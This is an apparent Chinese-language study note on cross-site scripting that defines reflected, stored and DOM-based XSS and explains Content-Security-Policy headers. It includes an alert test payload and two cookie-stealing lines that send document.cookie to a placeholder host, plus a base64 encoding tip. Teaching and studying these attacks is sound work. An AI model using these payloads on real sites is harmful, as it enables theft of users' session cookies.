08-WEB-跨站脚本攻击
08-WEB-跨站脚本攻击
xss
跨站脚本攻击是一种将任意js代码插入到其他web用户页面里执行以达到攻击目的的漏洞。
在html页面里嵌入恶意代码,当用户浏览时,这些潜入在html中的恶意代码就会别执行,从而达到攻击者的目的,如:cookie窃取等
弹窗 </p><script>alert(1);</script><p>
返回cookie document.cookie
拿去cookie_请求的带出
1.window.open("http://xxx/?q="%2bdocument.cookie);
2.window.location.href="http://xxx/?q="%2bdocument.cookie;
过长可以使用btoa进行base64编码 btoa(document.cookie)
xss分类
反射型 存储型
Dom-Based xss
dom是文档对象模型的缩写,是html文档的对象表示,同时也是外部内容(例如 js)与html元素之间的接口
dom型xss攻击在服务器返回html文档的时候,是不包含恶意脚本的;恶意脚本时起执行了非恶意脚本后,被注入到文档里的。反射型xss发生在页面加载时,dom型xss发生在加载完成后的一段时间内
csp
csp,内容安全策略。主要以白名单的形式配置可信任的内容来源
Content-Security-Policy:default-ssrc 'self'
限制所有的外部资源,都只能从当前域名加载
default-src是csp指令,多个指令之间用英文分号分隔;多个指令值用英文空格分隔,如:
Content-Security-Policy:default-src https://host1.com https://host2.com;frame-src 'none';object-src 'none'
xss to ssrf
例题
浙公网安备 33010602011771号